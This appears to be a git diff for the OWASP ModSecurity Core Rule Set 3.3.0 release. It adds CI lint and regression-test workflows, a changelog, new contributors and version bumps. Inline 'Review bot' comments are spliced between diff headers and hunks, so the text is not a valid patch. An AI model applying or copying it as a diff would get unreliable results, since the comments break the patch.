diff --git a/.github/ISSUE_TEMPLATE/01_false-positive.md b/.github/ISSUE_TEMPLATE/01_false-positive.md
index 309fde04d..eeb0b7a3e 100644
--- a/.github/ISSUE_TEMPLATE/01_false-positive.md
+++ b/.github/ISSUE_TEMPLATE/01_false-positive.md
@@ -6,10 +6,6 @@ labels: 'False Positive'
 assignees: ''
 ---
-PLEASE DON'T CREATE NEW ISSUES USING THIS REPO.
-
-WE ARE PERFORMING A MIGRATION RIGHT NOW.
-
 ### Description
diff --git a/.github/ISSUE_TEMPLATE/02_false-negative.md b/.github/ISSUE_TEMPLATE/02_false-negative.md
index bfae5531b..75b0e3544 100644
--- a/.github/ISSUE_TEMPLATE/02_false-negative.md
+++ b/.github/ISSUE_TEMPLATE/02_false-negative.md
@@ -6,10 +6,6 @@ labels: 'False Negative - Evasion'
 assignees: ''
 ---
-PLEASE DON'T CREATE NEW ISSUES USING THIS REPO.
-
-WE ARE PERFORMING A MIGRATION RIGHT NOW.
-
 ### Description
diff --git a/.github/ISSUE_TEMPLATE/03_bug-report.md b/.github/ISSUE_TEMPLATE/03_bug-report.md
index ce8b5db83..bc130f67f 100644
--- a/.github/ISSUE_TEMPLATE/03_bug-report.md
+++ b/.github/ISSUE_TEMPLATE/03_bug-report.md
@@ -6,10 +6,6 @@ labels: 'Bug'
 assignees: ''
 ---
-PLEASE DON'T CREATE NEW ISSUES USING THIS REPO.
-
-WE ARE PERFORMING A MIGRATION RIGHT NOW.
-
 ### Describe the bug
diff --git a/.github/ISSUE_TEMPLATE/04_feature.md b/.github/ISSUE_TEMPLATE/04_feature.md
index 0cb85ed80..b2e82b611 100644
--- a/.github/ISSUE_TEMPLATE/04_feature.md
+++ b/.github/ISSUE_TEMPLATE/04_feature.md
@@ -6,10 +6,6 @@ labels: 'Feature Request'
 assignees: ''
 ---
-PLEASE DON'T CREATE NEW ISSUES USING THIS REPO.
-
-WE ARE PERFORMING A MIGRATION RIGHT NOW.
-
 ### Motivation
diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml
new file mode 100644
index 000000000..161deb47a
--- /dev/null
+++ b/.github/workflows/lint.yaml
@@ -0,0 +1,38 @@
+---
+name: Lint
+
+on: [push, pull_request]
+
+jobs:
+ check-syntax:
+ runs-on: ubuntu-latest
+ strategy:
+ fail-fast: true
+ # check why is failing and change afterwards
+ steps:
+ - name: Checkout repo
+ uses: actions/checkout@v2
+
+ - name: Lint Yaml
+ uses: ibiqlik/action-yamllint@v1
+ with:
+ file_or_dir: tests/regression/tests/**/*.yaml
+ config_file: .yamllint.yml
+
+ - name: Linelint
+ uses: fernandrone/linelint@master
+ id: linelint
+
+ - name: Set up Python 3
+ uses: actions/setup-python@v1
+ with:
+ python-version: 3.6
+
+ - name: "Check CRS syntax"
+ run: |
+ python -V
+ pip install --upgrade setuptools
+ pip install -r tests/integration/requirements.txt
+ git clone https://github.com/CRS-support/secrules_parsing
+ pip install -r secrules_parsing/requirements.txt
+ python secrules_parsing/secrules_parser.py -c -f rules/*.conf
diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml
new file mode 100644
index 000000000..1f2019b80
--- /dev/null
+++ b/.github/workflows/test.yml
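Review bot: `uses: fernandrone/linelint@master` pins a third-party action to a moving branch, so whatever is pushed to that repository next runs inside this workflow with the checkout and the job's token; the other actions in the hunk are at least on tags (`@v1`, `@v2`). The "Check CRS syntax" step has the same shape: it clones `CRS-support/secrules_parsing` at whatever its HEAD is and then runs `pip install -r secrules_parsing/requirements.txt` from that checkout. Pin both to a release tag or commit, e.g. `uses: fernandrone/linelint@<tag-or-sha>` and `git clone --branch <tag> https://github.com/CRS-support/secrules_parsing` (placeholders), so a CI run is reproducible and reviewable. Minor: `python-version: 3.6` is an unquoted float; `python-version: "3.6"` avoids the `3.10` → `3.1` trap when the version is bumped later.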
@@ -0,0 +1,74 @@
+---
+name: Regression Tests
+
+on:
+ push:
+ paths:
+ - 'rules/**'
+ - 'tests/**'
+ - '.github/**'
+ pull_request:
+ paths:
+ - 'rules/**'
+ - 'tests/**'
+ - '.github/**'
+
+jobs:
+ # "modsec2-apache", "modsec3-apache", "modsec3-nginx"
+ regression:
+ runs-on: ubuntu-latest
+ strategy:
+ # change to true
+ fail-fast: false
+ matrix:
+ modsec_version: [modsec2-apache]
+ tests: [REQUEST-911-METHOD-ENFORCEMENT,
+ REQUEST-913-SCANNER-DETECTION,
+ REQUEST-920-PROTOCOL-ENFORCEMENT,
+ REQUEST-921-PROTOCOL-ATTACK,
+ REQUEST-930-APPLICATION-ATTACK-LFI,
+ REQUEST-931-APPLICATION-ATTACK-RFI,
+ REQUEST-932-APPLICATION-ATTACK-RCE,
+ REQUEST-933-APPLICATION-ATTACK-PHP,
+ REQUEST-934-APPLICATION-ATTACK-NODEJS,
+ REQUEST-941-APPLICATION-ATTACK-XSS,
+ REQUEST-942-APPLICATION-ATTACK-SQLI,
+ REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION,
+ REQUEST-944-APPLICATION-ATTACK-JAVA]
+ # Will include soon for modsec3-nginx
+
+ steps:
+ - name: Checkout repo
+ uses: actions/checkout@v2
+
+ - name: Set up Python 2
+ uses: actions/setup-python@v1
+ with:
+ python-version: 2.7
+
+ - name: "Run tests for ${{ matrix.modsec_version }}`"
+ env:
+ CONFIG: ${{ matrix.modsec_version }}
+ run: |
+ python -V
+ mkdir -p logs/"${CONFIG}"
+ docker-compose -f ./tests/docker-compose.yml up -d "${CONFIG}"
+ pip install --upgrade setuptools
+ pip install -r tests/regression/requirements.txt
+ # Use mounted volume path
+ if [[ "${CONFIG}" == *"nginx" ]]; then
+ LOGDIR="/var/log/nginx"
+ else
+ LOGDIR="/var/log/apache2"
+ fi
+ sed -ie "s:${LOGDIR}:${GITHUB_WORKSPACE}/logs/${CONFIG}:g" tests/regression/config.ini
+ py.test -vs tests/regression/CRS_Tests.py \
+ --config="${CONFIG}" \
+ --ruledir=./tests/regression/tests/${{ matrix.tests }}
+
+ - name: Clean docker-compose
+ env:
+ CONFIG: modsec2-apache
+ run: |
+ docker-compose -f ./tests/docker-compose.yml stop "${CONFIG}"
+ docker-compose -f ./tests/docker-compose.yml down
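Review bot: The "Clean docker-compose" step hardcodes `CONFIG: modsec2-apache` while the test step derives it from `${{ matrix.modsec_version }}`, so as soon as the commented-out `modsec3-*` entries are added to the matrix the cleanup will stop the wrong container; use `CONFIG: ${{ matrix.modsec_version }}` there as well, and add `if: always()` to the step so containers are also torn down when py.test fails. The step name `"Run tests for ${{ matrix.modsec_version }}`"` has a stray backtick before the closing quote. `sed -ie` is read by GNU sed as `-i` with backup suffix `e`, which leaves a `config.inie` copy in the workspace; `sed -i -e "..."` is what is intended. `python-version: 2.7` should be quoted like any version-matrix value (`"2.7"`).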
diff --git a/.linelint.yml b/.linelint.yml
new file mode 100644
index 000000000..12e7c88e6
--- /dev/null
+++ b/.linelint.yml
@@ -0,0 +1,12 @@
+rules:
+ # checks if file ends in a newline character
+ end-of-file:
+ # set to true to enable this rule
+ enable: true
+
+ # set to true to disable autofix (if enabled globally)
+ disable-autofix: true
+
+ # will be ignored only by this rule
+ ignore:
+ - .pytest_cache/*
diff --git a/.yamllint.yml b/.yamllint.yml
new file mode 100644
index 000000000..6e15cc115
--- /dev/null
+++ b/.yamllint.yml
@@ -0,0 +1,18 @@
+extends: default
+
+rules:
+ # Test lines can be big
+ line-length:
+ max: 1024
+ level: warning
+ # These files below have very large lines, needed for the test.
+ # So they will raise warnings every time.
+ ignore: |
+ tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
+ tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
+ tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
+
+ # don't bother me with this rule
+ indentation: disable
+
+ comments: {require-starting-space: false}
diff --git a/CHANGES b/CHANGES
index 1db31d8fa..80a0b6f65 100644
--- a/CHANGES
+++ b/CHANGES
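Review bot: `indentation: disable` in `.yamllint.yml` switches off the one rule that catches mis-nested keys in the regression test files the lint workflow exists to check, and `comments: {require-starting-space: false}` is the only flow-style mapping in a file that is otherwise block style. The indentation rule can be relaxed rather than disabled: setting `spaces: consistent` and `indent-sequences: whatever` under `indentation:` tolerates the mixed list indentation the comment "don't bother me with this rule" presumably refers to, while still reporting structural errors. For consistency, write the comments rule in block form as `comments:` with `require-starting-space: false` nested beneath it.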
@@ -1,10 +1,157 @@ == OWASP ModSecurity Core Rule Set (CRS) CHANGES == == Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == -* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues +* https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at * https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +== Version 3.3.0 - 2020-06-16 == + +Important changes: + * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the correct separator to use. + +New functionality: + * Block backup files ending with ~ in filename (Menin Andrea) + * Detect ffuf vuln scanner (Will Woodson) + * Detect SemrushBot crawler (Christian Folini) + * Detect WFuzz vuln scanner (#1614) (azurit) + * New ldap injection rule 921200 (Christian Folini) + * new rule HTTP Splitting (theMiddleBlue) + +Removed functionality: + * None. + +Improved compatibility: + * Changed variable to lowercase (modsec3 behavior fix) (Ervin Hegedus) + +Fixes and improvements: + * fix(ci): use log_contains instead (Felipe Zipitria) + * Move test where it belongs (Federico G. 
Schwindt) + * fix(ci): use docker in DetectionOnly (Felipe Zipitria) + * fix(rule): remove dangling whitespace (Felipe Zipitria) + * fix(ci): run actions on .github change (Felipe Zipitria) + * fix(docs): update badges and links in readme (Felipe Zipitria) + * README: update repo link (Walter Hop) + * Update README: Copyright 2019 -> 2020 (Christian Folini) + * fix(ci): run tests also on PRs (Felipe Zipitria) + * fix(ci): change test name and fix default params (Felipe Zipitria) + * Restore Travis Status (was in the wrong repo) (Christian Folini) + * Remove outdated Travis status after migration (Christian Folini) + * feat(ci): adds github actions testing (Felipe Zipitria) + * fix(migration): post migration tasks (Felipe Zipitria) + * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) + * Added more explanations to comment of 920300 (Christian Folini) + * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) + * Update nextcloud excl rules and shorten var (Franziska Bühler) + * Change to preferred lowercase var (Franziska Bühler) + * Set var to lowercase and change comment (Franziska Bühler) + * Resolve issue with allowed_request_content_types (Franziska Bühler) + * Allow REPORT requests without Content-Type header in Nextcloud (pyllyukko) + * Suppress rule 200002 when editing contacts in Nextcloud (pyllyukko) + * XenForo: update exclusions (Walter Hop) + * WordPress: exclude additional URL fields in profile editor (Walter Hop) + * add www to link (NullIsNot0) + * Fix link for 941310 Old link does not work anymore. Change it to new one. 
(NullIsNot0) + * Add Content-Type: multipart/related as allowed default (jeremyjpj0916) + * Resolve issue 1722 and fix content-type whitelisting (Franziska Bühler) + * make severities and scores consistent (Walter Hop) + * add QQGameHall UA (#1731) (theMiddle) + * another test (Allan Boll) + * Add word boundaries around values in SQL tautologies (942130) (Allan Boll) + * Move tests to their own file, while here also correct permissions for 920180. (Federico G. Schwindt) + * Rule to check if both C-L and T-E are present (#1310) (Federico G. Schwindt) + * Fixes for 2 tests in 921200 (Christian Folini) + * XenForo: add exclusions, remove unnecessary chains (#1673) (Walter Hop) + * Fix FPs for 942350 (#1706) (Franziska Bühler) + * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Narrowing down the subpattern .*? in 941130 (Christian Folini) + * Restricting a wide regex a bit (Christian Folini) + * Drop escapes (Christian Folini) + * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) + * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) + * Remove trailing dot in several msg actions (#1678) (nerrehmit) + * Replace REQUEST_BODY with ARGS on 930100 and 930110 (#1659) (theMiddle) + * Temporary travis workaround to buy time and fix it for good (#1684) (theMiddle) + * Add regression tests (Franziska Bühler) + * Fix FP with create with 942360 (Franziska Bühler) + * Avoid embedded anchors in CRS rule 942330 (Allan Boll) + * Update 942450 for less false positives, more tests (#1662) (Will Woodson) + * Ensure single ranges are also checked (#1661) (Federico G. Schwindt) + * WordPress: also exclude posts/pages endpoint in subdirectories (Walter Hop) + * For bugs, also ask for the environment (#1657) (Federico G. 
Schwindt) + * XenForo: fix incorrect escape (Walter Hop) + * XenForo: additional exclusions (Walter Hop) + * Pattern cleanup across several rules (#1643). Drop unneeded non-capture groups; No need to escape "-" outside character classes And only if it is not at the end. (Federico G. Schwindt) + * Improve rule 941350: Previously, this rule will also match on the equivalent to "<..<". Rewrite it so it is only triggered by the equivalent to "<..>", simplifying the pattern quite a bit as a bonus. While here add a link describing the bypass for future reference. + * Fix test Was using the equivalent to "<...<" instead of "<...>". (Federico G. Schwindt) + * Move the help and support link to contacts (#1647) While here rename to ensure they are presented in the right order and minor cosmetics. (Federico G. Schwindt) + * Move remaining regression test data file to new folder, cleanup README (#1646) (Peter Bittner) + * Also ask for the paranoia level (Federico G. Schwindt) + * Make it a tiny bit more colorful (Federico G. Schwindt) + * Spacing (Federico G. Schwindt) + * Fix emoji (Federico G. Schwindt) + * Switch to multiple templates for github issues (#1644) (Federico G. Schwindt) + * Fix paranoia-level log description (theMiddleBlue) + * change IRC to Slack (Walter Hop) + * fix spacing (Walter Hop) + * Moving tests and documentation folders (#1627) (soufianebenali) + * add triggered rule (#1636) (theMiddle) + * Drop the translate header from the restricted list Fixes #1410. (Federico G. Schwindt) + * Mark stale issues (Federico G. Schwindt) + * Added support for >). Use negated classes for better performance. (Federico G. Schwindt) + * Add test for issue #1580 (#1612) (Federico G. Schwindt) + * removes t:lowercase (theMiddleBlue) + * Move integration tests to their own job (#1608) Also cleanup branches' list. (Federico G. Schwindt) + * Add PL1 tag. 
(Anna Winkler) + * Change version number for full version name (Felipe Zipitria) + * Better document legacy conversion procedure Add text with instructions for a simple conversion utility. (Felipe Zipitria) + * Correct example text regarding GeoIP. Add maxmind tool for downloading files (Felipe Zipitria) + * Ignore configuration files generated by the JetBrains editors (Anna Winkler) + * Update name of branch to use for feature branches. Minor syntax updates. (Anna Winkler) + * Minor optimisation (Emile-Hugo SPIR) + * Also fix the `as herefrom` pattern (Emile-Hugo SPIR) + * More conservative fix (Emile-Hugo SPIR) + * Update the source file (Emile-Hugo SPIR) + * Fix a FP (`, aside from`) (Emile-Hugo SPIR) + * regression fix for #1581 (emphazer) + * Change order to check ip first in both rules (Felipe Zipitria) + * Change chain order (Felipe Zipitria) + * Fix spacing in text (Felipe Zipitria) + * Add link to mailing list archives (Felipe Zipitria) + * Adding new test for 941150 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941340 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941280 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941170 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941250 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941220 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941330 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941300 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941230 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941260 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941290 based on XSS cheatsheet by portswigger (Christian Folini) + * Adding new test for 941270 based on XSS cheatsheet by 
portswigger (Christian Folini) + * Adding new test for 942180 based on XSS cheatsheet by portswigger (Christian Folini) + * Update mailing list links to google group (Felipe Zipitria) + * Fix typo and add 2 new entries to 941160 (Franziska Bühler) + * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) + * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) + * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) + * adds .swp to restricted ext (theMiddleBlue) + * fix rule regex due to remove t:removeComments (theMiddleBlue) + * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) + * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) + == Version 3.2.0 - 2019-09-24 == New functionality: @@ -323,7 +470,7 @@ Documentation: * Fixed comment for arg limit check rule 920370 (Christian Folini) * Created CONTRIBUTORS file * Added Christoph Hansen (emphazer) to CONTRIBUTORS file - * Added Franziska Bühler (franbuehler) to CONTRIBUTORS file + * Added Franziska Bühler (Franziska Bühler) to CONTRIBUTORS file * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 829ef4cf0..d91678ffd 100644 --- a/CONTRIBUTING.md 
+++ b/CONTRIBUTING.md
@@ -150,4 +150,3 @@ Within a rule file / block, there are sometimes smaller groups of rules that bel
 Stricter siblings often have a different paranoia level. This means that the base rule and the stricter sibling do not reside next to one another in the rule file. Instead they are ordered in their appropriate paranoia level and can be linked via the first digits of the rule id. It is a good practice to introduce stricter siblings together with the base rule in the comments of the base rule and to reference the base rule with the keyword stricter sibling in the comments of the stricter sibling. E.g., "... This is performed in two separate stricter siblings of this rule: 9XXXX1 and 9XXXX2", "This is a stricter sibling of rule 9XXXX0."
-
diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md
index 88d4ee7e8..c697be7b5 100644
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -1,3 +1,5 @@
+# Contributors
+
 ## Project Co-Leads:
 - [Chaim Sanders](https://github.com/csanders-git)
@@ -20,8 +22,10 @@
 - [Zack Allen](https://github.com/zmallen)
 - [azhao155](https://github.com/azhao155)
+- [azurit](https://github.com/azurit)
 - [Matt Bagley](https://github.com/bagley)
 - [Ryan Barnett](https://github.com/rcbarnett)
+- [soufianebenali](https://github.com/soufianebenali)
 - [Peter Bittner](https://github.com/bittner)
 - [Allan Boll](https://github.com/allanbomsft)
 - [Jeremy Brown](https://github.com/jwbrown77)
@@ -37,30 +41,38 @@
 - [Aaron Haaf](https://github.com/Everspace)
 - [Michael Haas](https://github.com/MichaelHaas)
 - [jamuse](https://github.com/jamuse)
+- [jeremyjpj0916](https://github.com/jeremyjpj0916)
 - [jschleus](https://github.com/jschleus)
 - [Krzysztof Kotowicz](https://github.com/koto)
 - [Max Leske](https://github.com/theseion)
 - Manuel Leos
 - [Evgeny Marmalstein](https://github.com/shimshon70)
+- [meetug](https://github.com/meetug)
 - [Christian Mehlmauer](https://github.com/FireFart)
 - [Glyn Mooney](https://github.com/skidoosh)
 - [na1ex](https://github.com/na1ex)
 - [Jose Nazario](https://github.com/paralax)
+- [Tim Herren](https://github.com/nerrehmit)
 - [Scott O'Neil](https://github.com/cPanelScott)
+- [NullIsNot0](https://github.com/NullIsNot0)
 - [Robert Paprocki](https://github.com/p0pr0ck5)
 - [Christian Peron](https://github.com/csjperon)
 - [Elia Pinto](https://github.com/yersinia)
+- [pyllyukko](https://github.com/pyllyukko)
 - [Brian Rectanus](https://github.com/b1v1r)
 - [Rufus125](https://github.com/Rufus125)
 - Ofer Shezaf
 - Breno Silva
 - siric\_
+- Emile-Hugo Spir
 - [Marc Stern](https://github.com/marcstern)
 - [Simon Studer](https://github.com/studersi)
 - [supplient](https://github.com/supplient)
 - [theMiddle](https://github.com/theMiddleBlue)
 - [Ben Williams](https://github.com/benwilliams)
+- [Anna Winkler](https://github.com/annawinkler)
 - [Avery Wong](https://github.com/4v3r9)
+- [Will Woodson](https://github.com/wjwoodson)
 - [Greg Wroblewski](https://github.com/gwroblew)
 - [XeroChen](https://github.com/XeroChen)
 - [ygrek](https://github.com/ygrek)
diff --git a/INSTALL b/INSTALL
index 63b806505..cf83cdb77 100644
--- a/INSTALL
+++ b/INSTALL
@@ -303,4 +303,3 @@ OWASP CRS Configuration
 crs-setup.conf file. There are many other options that have to do with aspects of web application security that are beyond this document but are well explained in crs-setup.conf.
-
diff --git a/README.md b/README.md
index 74ba4300f..44f93e878 100644
--- a/README.md
+++ b/README.md
@@ -1,8 +1,11 @@
-![Travis build v3.3/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.3/dev?label=v3.3%2Fdev)
-![Travis build v3.2/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.2/dev?label=v3.2%2Fdev)
-![Travis build v3.1/dev](https://img.shields.io/travis/spiderlabs/owasp-modsecurity-crs/v3.1/dev?label=v3.1%2Fdev)
-[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Flagship_Projects)
+![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev)
+![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev)
+![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev)
+[![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/)
 [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390)
+[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+
+
 # OWASP ModSecurity Core Rule Set (CRS)
@@ -16,7 +19,7 @@ Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/)
 We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections.
-[Create an issue on GitHub](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log.
+[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log.
 [Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list.
@@ -24,6 +27,6 @@ We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beg
 ## License
-Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details.
diff --git a/crs-setup.conf.example b/crs-setup.conf.example
index 99957c6bb..7b140b9a6 100644
--- a/crs-setup.conf.example
+++ b/crs-setup.conf.example
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -88,7 +88,7 @@
 # Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log
 # - By default, offending requests are blocked with an error 403 response.
-# - To change the disruptive action, see RESPONSE-999-EXCEPTIONS.conf.example
+# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
 # and review section 'Changing the Disruptive Action for Anomaly Mode'.
 # - In Apache, you can use ErrorDocument to show a friendly error page or
 # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
@@ -98,7 +98,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # Example: Anomaly Scoring mode, log only to ModSecurity audit log
 # - By default, offending requests are blocked with an error 403 response.
-# - To change the disruptive action, see RESPONSE-999-EXCEPTIONS.conf.example
+# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
 # and review section 'Changing the Disruptive Action for Anomaly Mode'.
 # - In Apache, you can use ErrorDocument to show a friendly error page or
 # perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
@@ -569,7 +569,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # entry in the audit log (for performance reasons), but an error log entry is
 # written. If you want to disable the error log entry, then issue the
 # following directive somewhere after the inclusion of the CRS
-# (E.g., RESPONSE-999-EXCEPTIONS.conf).
+# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf).
 #
 # SecRuleUpdateActionById 901150 "nolog"
 #
@@ -825,4 +825,4 @@ SecAction \
 nolog,\
 pass,\
 t:none,\
- setvar:tx.crs_setup_version=320"
+ setvar:tx.crs_setup_version=330"
diff --git a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
index 1fb97cc86..8a23edafb 100644
--- a/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
+++ b/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
diff --git a/rules/REQUEST-901-INITIALIZATION.conf b/rules/REQUEST-901-INITIALIZATION.conf
index 1de9cc6cc..06aa944e5 100644
--- a/rules/REQUEST-901-INITIALIZATION.conf
+++ b/rules/REQUEST-901-INITIALIZATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -25,7 +25,7 @@
 #
 # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature
 #
-SecComponentSignature "OWASP_CRS/3.2.0"
+SecComponentSignature "OWASP_CRS/3.3.0"
 #
 # -=[ Default setup values ]=-
@@ -58,7 +58,7 @@ SecRule &TX:crs_setup_version "@eq 0" \
 log,\
 auditlog,\
 msg:'ModSecurity Core Rule Set is deployed without configuration! Please copy the crs-setup.conf.example template to crs-setup.conf, and include the crs-setup.conf file in your webserver configuration before including the CRS rules. See the INSTALL file in the CRS directory for detailed instructions',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL'"
@@ -76,7 +76,7 @@ SecRule &TX:inbound_anomaly_score_threshold "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.inbound_anomaly_score_threshold=5'"
 # Default Outbound Anomaly Threshold Level (rule 900110 in setup.conf)
@@ -85,7 +85,7 @@ SecRule &TX:outbound_anomaly_score_threshold "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.outbound_anomaly_score_threshold=4'"
 # Default Paranoia Level (rule 900000 in setup.conf)
@@ -94,7 +94,7 @@ SecRule &TX:paranoia_level "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.paranoia_level=1'"
 # Default Executing Paranoia Level (rule 900000 in setup.conf)
@@ -103,7 +103,7 @@ SecRule &TX:executing_paranoia_level "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.executing_paranoia_level=%{TX.PARANOIA_LEVEL}'"
 # Default Sampling Percentage (rule 900400 in setup.conf)
@@ -112,7 +112,7 @@ SecRule &TX:sampling_percentage "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.sampling_percentage=100'"
 # Default Anomaly Scores (rule 900100 in setup.conf)
@@ -121,7 +121,7 @@ SecRule &TX:critical_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.critical_anomaly_score=5'"
 SecRule &TX:error_anomaly_score "@eq 0" \
@@ -129,7 +129,7 @@ SecRule &TX:error_anomaly_score "@eq 0" \
 phase:1,\
 pass,\
 nolog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
